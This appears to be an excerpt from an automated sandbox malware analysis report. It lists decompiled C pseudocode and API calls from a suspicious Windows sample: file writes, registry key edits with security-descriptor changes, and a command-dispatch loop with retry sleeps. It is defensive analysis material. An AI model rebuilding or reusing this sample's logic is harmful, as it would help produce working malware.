    					 *((intOrPtr*)( *((intOrPtr*)( *_t18 + 0xfc))))(_t18, 0);
    					_t20 = _v8;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t20 + 0x110))))(_t20, 0);
    					_t22 = _v8;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t22 + 0x118))))(_t22, 0);
    					 *((intOrPtr*)(__ecx + 4)) = _v8;
    					return __ecx;
    				}
    			}

    APIs
    • CoCreateInstance.OLE32(003B32CC,00000000,00000001,003B32DC,00000000,00396A37,?,00000000), ref: 0039E55C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00391A80(void* __ecx, WCHAR* _a4, void* _a8, long _a12) {
    				long _v8;
    				void* _t10;
    				int _t14;
    				intOrPtr _t23;
    				long _t25;
    				void* _t28;
    
    				_t25 = 0;
    				_v8 = 0;
    				_t10 = CreateFileW(_a4, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
    				_t28 = _t10;
    				if(_t28 != 0xffffffff) {
    					_t14 = WriteFile(_t28, _a8, _a12,  &_v8, 0); // executed
    					if(_t14 != 0) {
    						_t25 = 1;
    					}
    					_t23 =  *0x3b8628; // 0x593938
    					 *((intOrPtr*)( *((intOrPtr*)(_t23 + 0xf8))))(_t28);
    				}
    				return _t25;
    			}

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
    • WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00392DF0(struct _SECURITY_ATTRIBUTES** __ecx, void* __eflags) {
    				short _v204;
    				signed char _t16;
    				intOrPtr _t27;
    				struct _SECURITY_ATTRIBUTES** _t29;
    
    				_t29 = __ecx;
    				 *__ecx = 0;
    				__ecx[1] = 0;
    				__ecx[2] = 0;
    				__ecx[3] = 0;
    				E00399090(__eflags,  &_v204, 0x71);
    				_t16 = GetFileAttributesW( &_v204); // executed
    				if(_t16 != 0xffffffff) {
    					__eflags = _t16 & 0x00000010;
    					if((_t16 & 0x00000010) == 0) {
    						__eflags =  *0x3b8580;
    						if( *0x3b8580 == 0) {
    							_t27 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xa4))))( &_v204);
    							goto L6;
    						}
    					}
    				} else {
    					if( *0x3b8580 == 0) {
    						L6:
    						CreateDirectoryW( &_v204, 0); // executed
    					}
    				}
    				return _t29;
    			}

    APIs
    • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00392E3B
    • CreateDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00392E81
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00391140(char _a4, void* _a8, long _a12, long _a16) {
    				void* _t6;
    				int _t8;
    
    				_t6 = _a8;
    				if(_t6 != 0) {
    					_t5 =  &_a4; // 0x397a34
    					_t8 = VirtualFreeEx( *_t5, _t6, _a12, _a16); // executed
    					return _t8;
    				}
    				return _t6;
    			}

    APIs
    • VirtualFreeEx.KERNELBASE(4z9,?,00000000,00000000,?,003979B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00397A34), ref: 00391160
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 93%
    			E00391B20(intOrPtr __ecx, void* __edx, void* __eflags) {
    				intOrPtr _t22;
    				struct _SECURITY_ATTRIBUTES** _t23;
    				intOrPtr _t24;
    				intOrPtr _t25;
    				void* _t29;
    				void* _t37;
    				intOrPtr _t39;
    				void* _t43;
    
    				_t43 = __eflags;
    				_t37 = __edx;
    				_t39 = __ecx;
    				E00392750(__ecx + 0x4f4);
    				E00395000(__ecx + 0x4fc);
    				 *((intOrPtr*)(__ecx + 0x18)) = 0;
    				 *((intOrPtr*)(__ecx + 0x14)) = 0;
    				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
    				 *((intOrPtr*)(__ecx + 0x20)) = 0;
    				 *((intOrPtr*)(__ecx + 0x28)) = 0;
    				memset(__ecx + 0x30, 0, 0x2c);
    				_t29 = _t39 + 0x5c;
    				memset(_t29, 0, 0x498); // executed
    				_t22 = E00394A10(_t43); // executed
    				 *((intOrPtr*)(_t39 + 0x24)) = _t22;
    				_t23 = E0039F0A0();
    				_push(0x10);
    				 *((intOrPtr*)(_t39 + 0x1c)) = _t23;
    				L0039A47E();
    				_t44 = _t23;
    				if(_t23 == 0) {
    					_t24 = 0;
    					__eflags = 0;
    				} else {
    					_t24 = E00392DF0(_t23, _t44); // executed
    				}
    				 *((intOrPtr*)(_t39 + 4)) = _t24;
    				_push(0x10);
    				 *((intOrPtr*)(_t24 + 8)) = _t39;
    				L0039A47E();
    				if(_t24 == 0) {
    					_t25 = 0;
    					__eflags = 0;
    				} else {
    					_t25 = E0039CBF0(_t24, 0xc);
    				}
    				 *((intOrPtr*)(_t39 + 0xc)) = _t25;
    				 *_t29 = 0;
    				 *((intOrPtr*)(_t39 + 0x60)) = 0;
    				 *((intOrPtr*)(_t39 + 0x4ec)) = 1;
    				E003A14A0(_t39); // executed
    				E0039CE00(_t39, _t37); // executed
    				return _t39;
    			}

    APIs
    • memset.MSVCRT ref: 00391B53
    • memset.MSVCRT ref: 00391B62
      • Part of subcall function 00394A10: GetProcAddress.KERNEL32(00000000), ref: 00394A74
      • Part of subcall function 00394A10: GetNativeSystemInfo.KERNEL32(00000000), ref: 00394A8A
    • ??2@YAPAXI@Z.MSVCRT ref: 00391B79
    • ??2@YAPAXI@Z.MSVCRT ref: 00391B98
      • Part of subcall function 003A14A0: wsprintfW.USER32 ref: 003A1639
      • Part of subcall function 003A14A0: rand.MSVCRT ref: 003A1690
      • Part of subcall function 0039CE00: _time64.MSVCRT ref: 0039CE12
      • Part of subcall function 0039CE00: _time64.MSVCRT ref: 0039CE59
      • Part of subcall function 00392DF0: GetFileAttributesW.KERNELBASE(?,?,?), ref: 00392E3B
      • Part of subcall function 00392DF0: CreateDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00392E81
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003B0790(short* __edi, char __esi, void* __eflags) {
    				void _v516;
    				void* __ebx;
    				void* _t18;
    				void* _t19;
    				void* _t29;
    
    				_t29 = __eflags;
    				memset( &_v516, 0, 0x200);
    				E00399090(_t29,  &_v516, 0xc8);
    				_t19 =  &_v516;
    				E003B0640(_t19, __edi, __esi); // executed
    				memset(_t19, 0, 0x200);
    				E00399090(_t29, _t19, 0xc9);
    				_t12 =  &((StrStrW(_t19, 0x3b32c4))[1]);
    				E0039F630(0x80000002,  &((StrStrW(_t19, 0x3b32c4))[1])); // executed
    				E003B0640(_t19, __edi, __esi); // executed
    				memset(_t19, 0, 0x200);
    				E00399090(_t12, _t19, 0xca);
    				_t18 = E003B0640(_t19, __edi, __esi); // executed
    				return _t18;
    			}

    APIs
    • memset.MSVCRT ref: 003B07A8
      • Part of subcall function 003B0640: StrChrW.SHLWAPI(?,0000005C), ref: 003B0673
      • Part of subcall function 003B0640: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003B0688
      • Part of subcall function 003B0640: GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,00000000,00000000,00000000), ref: 003B06AD
      • Part of subcall function 003B0640: StrChrW.SHLWAPI(?,0000005C), ref: 003B06D6
      • Part of subcall function 003B0640: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003B06F1
      • Part of subcall function 003B0640: RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 003B0716
      • Part of subcall function 003B0640: SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 003B0732
    • memset.MSVCRT ref: 003B07D5
    • StrStrW.SHLWAPI(?,003B32C4), ref: 003B07F2
      • Part of subcall function 0039F630: memset.MSVCRT ref: 0039F660
      • Part of subcall function 0039F630: memcpy.MSVCRT ref: 0039F66B
    • memset.MSVCRT ref: 003B0817
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 66%
    			E0039EE40(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
    				char _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v1316;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t73;
    				intOrPtr _t75;
    				void* _t80;
    				void* _t82;
    				void* _t85;
    				intOrPtr _t86;
    				intOrPtr _t93;
    				intOrPtr _t100;
    				char _t123;
    				signed int _t124;
    				void* _t126;
    				void* _t127;
    
    				_t123 = 0;
    				_t126 = __ecx;
    				_v16 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				_t93 = 0;
    				_v24 = 0;
    				E00391B20( &_v1316, __edx, __eflags);
    				if( *((intOrPtr*)(_t126 + 0xc)) == 0) {
    					L25:
    					_t62 = _v8;
    					if(_v8 != _t123) {
    						E0039BB40(_t62); // executed
    						_t127 = _t127 + 4;
    					}
    					_t63 = _v16;
    					if(_v16 != _t123) {
    						E0039BB40(_t63);
    						_t127 = _t127 + 4;
    					}
    					if(_v24 == _t123 && _t93 != _t123) {
    						E00397A20(_t93, _t93, _t123);
    						_push(_t93);
    						L00391CB0();
    						_t93 = 0;
    					}
    					E0039F850(_t93,  &_v1316);
    					return _t93;
    				}
    				_v28 = E003926A0( *((intOrPtr*)(_t126 + 8)));
    				if(E003A0AD0( &_v1316, _t69) == 0) {
    					L23:
    					_t71 = _v28;
    					_t123 = 0;
    					if(_v28 != 0) {
    						E0039BB40(_t71);
    						_t127 = _t127 + 4;
    					}
    					goto L25;
    				}
    				_t73 =  *((intOrPtr*)(_t126 + 0xc));
    				_t100 =  *((intOrPtr*)(_t73 + 0x18));
    				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) - 1;
    				_v20 = _t100;
    				if(_t100 <= 0) {
    					goto L23;
    				} else {
    					goto L3;
    				}
    				do {
    					L3:
    					 *( *((intOrPtr*)(_t126 + 0xc)) + 0x24) =  *( *((intOrPtr*)(_t126 + 0xc)) + 0x24) + 1;
    					_t75 =  *((intOrPtr*)(_t126 + 0xc));
    					_v20 = _v20 - 1;
    					if( *((intOrPtr*)(_t75 + 0x24)) >=  *((intOrPtr*)(_t75 + 0x18))) {
    						 *((intOrPtr*)(_t75 + 0x24)) = 0;
    					}
    					_t124 =  *( *((intOrPtr*)(_t126 + 0xc)) + 0x24);
    					_t77 = _v8;
    					if(_v8 != 0) {
    						E0039BB40(_t77);
    						_t127 = _t127 + 4;
    						_v8 = 0;
    						_v12 = 0;
    					}
    					_v1316 =  *((intOrPtr*)( *((intOrPtr*)(_t126 + 8))));
    					_t80 = L003994D0( &_v1316,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) + 0x1c)) + _t124 * 4)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) + 0x20)) + _t124 * 4))); // executed
    					if(_t80 == 0) {
    						goto L18;
    					}
    					_t125 = _a4;
    					_push( &_v12);
    					_push( &_v8);
    					_push(_a4);
    					 *_a8 = 1;
    					_push(5);
    					_push( &_v1316); // executed
    					_t82 = E00395A10(); // executed
    					_t127 = _t127 + 0x14;
    					if(_t82 == 0) {
    						goto L18;
    					}
    					if(_v8 == 0 || _v12 == 0) {
    						goto L23;
    					} else {
    						_push(0xa8);
    						L0039A47E();
    						_t127 = _t127 + 4;
    						if(_t82 == 0) {
    							_t93 = 0;
    							__eflags = 0;
    						} else {
    							_t93 = E0039B110(_t82);
    						}
    						_t85 = E00397FC0(_t93,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 8)))), _v8, _v12, _t125); // executed
    						if(_t85 != 0) {
    							 *_a8 = 2;
    							_v24 = 1;
    							_t86 = E0039C7B0(_t126, __eflags, _t125);
    							_v16 = _t86;
    							__eflags = _t86;
    							if(_t86 != 0) {
    								__eflags =  *0x3b8580;
    								if( *0x3b8580 == 0) {
    									E00391A80(_v16, _v16, _v8, _v12); // executed
    									_t127 = _t127 + 0xc;
    								}
    							}
    							goto L23;
    						} else {
    							if(_t93 != 0) {
    								E00397A20(_t93, _t93, _t125);
    								_push(_t93);
    								L00391CB0();
    								_t127 = _t127 + 4;
    							}
    							_t93 = 0;
    							goto L18;
    						}
    					}
    					L18:
    				} while (_v20 > 0);
    				goto L23;
    			}

    APIs
      • Part of subcall function 00391B20: memset.MSVCRT ref: 00391B53
      • Part of subcall function 00391B20: memset.MSVCRT ref: 00391B62
      • Part of subcall function 00391B20: ??2@YAPAXI@Z.MSVCRT ref: 00391B79
      • Part of subcall function 00391B20: ??2@YAPAXI@Z.MSVCRT ref: 00391B98
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • ??2@YAPAXI@Z.MSVCRT ref: 0039EF57
      • Part of subcall function 00397FC0: SysFreeString.OLEAUT32(?), ref: 00397FFB
      • Part of subcall function 00397FC0: SysAllocString.OLEAUT32(0039EF86), ref: 00398005
    • ??3@YAXPAX@Z.MSVCRT ref: 0039EF96
      • Part of subcall function 0039C7B0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000), ref: 0039C828
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • ??3@YAXPAX@Z.MSVCRT ref: 0039F02B
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F90D
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F924
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F955
      • Part of subcall function 00397A20: SysFreeString.OLEAUT32(?), ref: 00397A3C
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00395A10(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _t27;
    				intOrPtr _t28;
    				intOrPtr _t30;
    				intOrPtr _t34;
    				intOrPtr _t38;
    				void* _t39;
    
    				_t34 = _a12;
    				_t27 = 0;
    				_t38 = _a4;
    				_t39 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				while(_t27 == 0) {
    					_t28 = _a8;
    					if(_t28 > 0x40) {
    						L17:
    						if(_t39 == 0xc8 || _t39 == 0x193 || _t39 == 0x194) {
    							L21:
    							_v8 = 1;
    							goto L22;
    						} else {
    							Sleep(0x4e20); // executed
    							L22:
    							_t30 = _v12 + 1;
    							_v12 = _t30;
    							_t27 = _v8;
    							if(_t30 < 3) {
    								continue;
    							}
    							break;
    						}
    					}
    					switch( *((intOrPtr*)(( *(_t28 + 0x395b8c) & 0x000000ff) * 4 +  &M00395B64))) {
    						case 0:
    							_t33 = E00395280(_t34, _t38, _t34, _a16); // executed
    							goto L16;
    						case 1:
    							__ecx = __edi;
    							__eax = E003A13A0(__ebx, __ecx);
    							goto L16;
    						case 2:
    							__eax = _a16;
    							__ecx = __edi; // executed
    							__eax = E00391200(__ecx, __ebx, _a16, _a20); // executed
    							goto L16;
    						case 3:
    							__ecx = __edi; // executed
    							__eax = E00396E80(__ecx); // executed
    							goto L16;
    						case 4:
    							__ecx = _a16;
    							__ecx = __edi; // executed
    							__eax = E003A0DC0(__ecx, __ebx, _a16); // executed
    							__esi = __eax;
    							if(__esi == 0xc8) {
    								goto L21;
    							}
    							if(__esi != 0x193 && __esi != 0x194) {
    								Sleep(0x9c40);
    							}
    							goto L17;
    						case 5:
    							__eax = _a20;
    							__ecx = _a16;
    							__ecx = __edi; // executed
    							__eax = E0039E5E0(__ebx, __ecx, __ebx, _a16, _a20, _a24); // executed
    							goto L16;
    						case 6:
    							__ecx = __edi;
    							__eax = E00396F60(__ebx, __ecx, __ebx);
    							goto L16;
    						case 7:
    							__ecx = __edi; // executed
    							__eax = E0039BBB0(__ecx); // executed
    							goto L16;
    						case 8:
    							__eax = _a28;
    							__ecx = _a24;
    							__eax = _a16;
    							_t21 = __edi + 0x4fc; // 0x4fc
    							__ecx = _t21;
    							__ecx = __edi;
    							__eax = E003990F0(__ebx, __ecx, __edi, __esi, _t21, __ebx, _a16, _a20, _a24, _a28, _a32);
    							L16:
    							_t39 = _t33;
    							goto L17;
    						case 9:
    							goto L17;
    					}
    				}
    				return _t27;
    			}

    APIs
      • Part of subcall function 00396E80: _wtoi.MSVCRT ref: 00396ECC
    • Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
    • Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 95%
    			E0039F630(void* _a4, void* _a8) {
    				void* _t12;
    				intOrPtr _t13;
    				void* _t14;
    				short _t23;
    				short* _t26;
    				short _t27;
    				short _t28;
    				void* _t30;
    				short _t31;
    				intOrPtr _t34;
    				intOrPtr _t36;
    				void* _t41;
    				int _t42;
    				short* _t43;
    				void* _t47;
    				void* _t48;
    				void* _t50;
    				void* _t51;
    
    				_t12 = _a8;
    				if(_t12 != 0) {
    					_t13 =  *0x3b8628; // 0x593938
    					_t31 = 0;
    					_t14 =  *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc))))(_t12, _t41, _t47, _t30);
    					_t4 = _t14 + 2; // 0x2
    					_t42 = _t14 + _t4;
    					_t48 = E003A1D90(_t42, 0);
    					memset(_t48, 0, _t42);
    					memcpy(_t48, _a8, _t42);
    					_t34 =  *0x3b8628; // 0x593938
    					_t51 = _t50 + 0x20;
    					_t7 = _t48 + 2; // 0x2
    					_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1e0))))(_t7, 0x3b32c4);
    					__eflags = _t43;
    					if(_t43 != 0) {
    						while(1) {
    							_t35 = _a4;
    							 *_t43 = 0; // executed
    							_t23 = E0039CEA0(_a4, _t48); // executed
    							_t31 = _t23;
    							_t51 = _t51 + 8;
    							__eflags = _t31;
    							if(__eflags == 0) {
    								_push(0);
    								_t28 = E003997E0(_t35, __eflags, _a4, _t48);
    								_t51 = _t51 + 0xc;
    								_t31 = _t28;
    							}
    							 *_t43 = 0x5c;
    							__eflags = _t31;
    							if(_t31 == 0) {
    								goto L9;
    							}
    							_t36 =  *0x3b8628; // 0x593938
    							_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x1e0))))(_t43 + 2, 0x3b32c4);
    							__eflags = _t43;
    							if(_t43 != 0) {
    								continue;
    							} else {
    								_t46 = _a4;
    								_t26 = E0039CEA0(_a4, _t48); // executed
    								_t51 = _t51 + 8;
    								__eflags = _t26;
    								if(__eflags == 0) {
    									_push(0);
    									_t27 = E003997E0(_t36, __eflags, _t46, _t48);
    									_t51 = _t51 + 0xc;
    									_t31 = _t27;
    								}
    							}
    							goto L9;
    						}
    					}
    					L9:
    					E0039BB40(_t48);
    					return _t31;
    				} else {
    					return 0;
    				}
    			}

    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memset.MSVCRT ref: 0039F660
    • memcpy.MSVCRT ref: 0039F66B
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039CEA0: lstrlenW.KERNEL32(?,?,?,?,003997FA,?,?), ref: 0039CEBD
      • Part of subcall function 0039CEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CEE1
      • Part of subcall function 0039CEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CEFC
      • Part of subcall function 0039CEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003997FA,?,?), ref: 0039CF1C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 58%
    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				long _t27;
    				signed int _t28;
    				signed int _t29;
    				signed int _t30;
    				int* _t31;
    				int _t32;
    				int _t34;
    				signed int _t41;
    				signed int _t44;
    				signed int _t47;
    				long _t57;
    				signed int _t59;
    				void* _t61;
    				intOrPtr _t69;
    
    				E00397131();
    				_push(0x5c);
    				_push(0x3b6b40);
    				E003B27E4(__ebx, __edi, __esi);
    				 *(_t61 - 0x1c) = 0;
    				 *((intOrPtr*)(_t61 - 4)) = 0;
    				GetStartupInfoW(_t61 - 0x6c);
    				 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
    				 *((intOrPtr*)(_t61 - 4)) = 1;
    				_t57 =  *( *[fs:0x18] + 4);
    				 *((intOrPtr*)(_t61 - 0x20)) = 0;
    				while(1) {
    					_t27 = InterlockedCompareExchange(0x3b8c3c, _t57, 0);
    					if(_t27 == 0) {
    						break;
    					}
    					if(_t27 != _t57) {
    						Sleep(0x3e8);
    						continue;
    					} else {
    						_t59 = 1;
    						 *((intOrPtr*)(_t61 - 0x20)) = 1;
    					}
    					L7:
    					_t28 =  *0x3b8c38; // 0x2
    					if(_t28 != _t59) {
    						_t29 =  *0x3b8c38; // 0x2
    						__eflags = _t29;
    						if(__eflags != 0) {
    							 *0x3b865c = _t59;
    							goto L14;
    						} else {
    							 *0x3b8c38 = _t59;
    							_t41 = E003A1B59(0x3b3240, 0x3b324c); // executed
    							__eflags = _t41;
    							if(__eflags == 0) {
    								goto L14;
    							} else {
    								goto L40;
    							}
    						}
    					} else {
    						_push(0x1f);
    						L0039F19C();
    						L14:
    						_t30 =  *0x3b8c38; // 0x2
    						if(_t30 == _t59) {
    							_push(0x3b323c);
    							_push(0x3b3234); // executed
    							L003927A8(); // executed
    							 *0x3b8c38 = 2;
    						}
    						if( *((intOrPtr*)(_t61 - 0x20)) == 0) {
    							InterlockedExchange(0x3b8c3c, 0);
    						}
    						_t69 =  *0x3b8c40; // 0x0
    						if(_t69 != 0) {
    							_push(0x3b8c40);
    							if(E00393D60(0, 0x3b8c3c, _t59, _t69) != 0) {
    								 *0x3b8c40(0, 2, 0);
    							}
    						}
    						_t31 = __imp___wcmdln;
    						if( *_t31 == 0) {
    							L40:
    							 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
    							_t32 = 0xff;
    						} else {
    							_t34 =  *_t31;
    							while(1) {
    								 *(_t61 - 0x24) = _t34;
    								_t44 =  *_t34 & 0x0000ffff;
    								if(_t44 > 0x20 || _t44 != 0 &&  *(_t61 - 0x1c) != 0) {
    									goto L34;
    								} else {
    									goto L26;
    								}
    								while(1) {
    									L26:
    									_t47 =  *_t34 & 0x0000ffff;
    									if(_t47 == 0 || _t47 > 0x20) {
    										break;
    									}
    									_t34 = _t34 + 2;
    									 *(_t61 - 0x24) = _t34;
    								}
    								__eflags =  *(_t61 - 0x40) & 0x00000001;
    								if(( *(_t61 - 0x40) & 0x00000001) == 0) {
    									_t44 = 0xa;
    								} else {
    									_t44 =  *(_t61 - 0x3c) & 0x0000ffff;
    								}
    								_push(_t44);
    								_push(_t34);
    								_push(0);
    								_push(0x390000); // executed
    								L0039FBF0(); // executed
    								 *0x3b8658 = _t34;
    								__eflags =  *0x3b864c; // 0x0
    								if(__eflags == 0) {
    									exit(_t34);
    									goto L34;
    								}
    								__eflags =  *0x3b865c; // 0x0
    								if(__eflags == 0) {
    									__imp___cexit();
    								}
    								 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
    								_t32 =  *0x3b8658; // 0x0
    								goto L41;
    								L34:
    								__eflags = _t44 - 0x22;
    								if(_t44 == 0x22) {
    									__eflags =  *(_t61 - 0x1c);
    									_t19 =  *(_t61 - 0x1c) == 0;
    									__eflags = _t19;
    									 *(_t61 - 0x1c) = 0 | _t19;
    								}
    								_t34 = _t34 + 2;
    							}
    						}
    					}
    					L41:
    					return E003B2829(_t32);
    				}
    				_t59 = 1;
    				__eflags = 1;
    				goto L7;
    			}

    APIs
      • Part of subcall function 00397131: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00397168
